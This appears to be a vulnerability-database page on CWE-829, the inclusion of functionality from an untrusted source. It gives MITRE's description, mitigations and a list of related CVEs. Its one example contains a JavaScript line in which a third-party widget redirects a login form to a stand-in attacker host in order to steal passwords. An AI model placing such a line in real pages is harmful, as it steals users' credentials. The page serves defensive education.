Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-829 (从非可信控制范围包含功能例程) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程). AI Chinese analysis included.

CWE-829 represents a critical software weakness where applications import or execute functionality from sources outside their intended control sphere, such as unverified third-party libraries or external APIs. Attackers typically exploit this vulnerability by compromising the external source or manipulating the inclusion mechanism to inject malicious code, thereby gaining unauthorized execution privileges or causing system compromise. This often occurs when developers blindly trust dependencies without verifying their integrity or origin. To mitigate this risk, developers must implement strict dependency management practices, including rigorous code review processes and the use of cryptographic signatures to verify the authenticity of included components. Additionally, employing sandboxing techniques and maintaining a minimal attack surface by removing unnecessary external dependencies can significantly reduce the likelihood of successful exploitation, ensuring that only trusted, vetted functionality is integrated into the application’s core logic.

MITRE CWE Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2022-4134 glance 安全漏洞 — openstack 3.5 -2023-03-06
CVE-2023-26053 Gradle usage of long IDs for PGP keys opens potential for collision attacks — gradle 6.6 Medium2023-03-02
CVE-2022-41216 Cloudflow - Local File Inclusion Vulnerability — Cloudflow 8.3 High2023-02-22
CVE-2022-22246 Junos OS: PHP file inclusion vulnerability in J-Web — Junos OS 7.5 High2022-10-18
CVE-2022-33317 Mitsubishi Electric MC Works64和ICONICS GENESIS64 安全漏洞 — GENESIS64 7.8 High2022-07-20
CVE-2022-31156 Gradle's dependency verification can ignore checksum verification when signature verification cannot be performed — gradle 6.6 Medium2022-07-14
CVE-2021-41037 Eclipse Equinox 安全漏洞 — Eclipse Equinox p2 10.0 Critical2022-07-08
CVE-2022-24824 Anonymous user cache poisoning in discourse — discourse 5.3 Medium2022-04-14
CVE-2022-1161 ICSA-22-090-05 Rockwell Automation Logix Controllers — 1768 CompactLogix controllers 10.0 Critical2022-04-11
CVE-2022-23630 Dependency verification bypass in Gradle — gradle 7.5 High2022-02-10
CVE-2021-41256 Intent URI permissions manipulation in nextcloud news-android — news-android 5.8 Medium2021-11-30
CVE-2021-32802 Preview generation used third-party library not suited for user-generated content in Nextcloud server — security-advisories 9.3 Critical2021-09-07
CVE-2021-3603 Inclusion of Functionality from Untrusted Control Sphere in PHPMailer/PHPMailer — PHPMailer 8.1 High2021-06-17
CVE-2021-29427 Repository content filters do not work in Settings pluginManagement — gradle 8.0 High2021-04-13
CVE-2020-8128 jsreport 代码问题漏洞 — jsreport 9.8 -2020-02-14
CVE-2019-11770 Eclipse Buildship 加密问题漏洞 — Eclipse Buildship 8.1 -2019-06-14
CVE-2019-10249 Xtend和Xtext 安全特征问题漏洞 — Eclipse Xtext 8.1 -2019-05-06
CVE-2019-10248 Eclipse Vorto 安全漏洞 — Eclipse Vorto 8.1 -2019-04-22
CVE-2019-10240 Eclipse hawkBit 加密问题漏洞 — Eclipse hawkBit 8.1 -2019-04-03
CVE-2018-1122 procps-ng 权限许可和访问控制问题漏洞 — procps-ng, procps 7.0 -2018-05-23

Vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程) represent 110 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.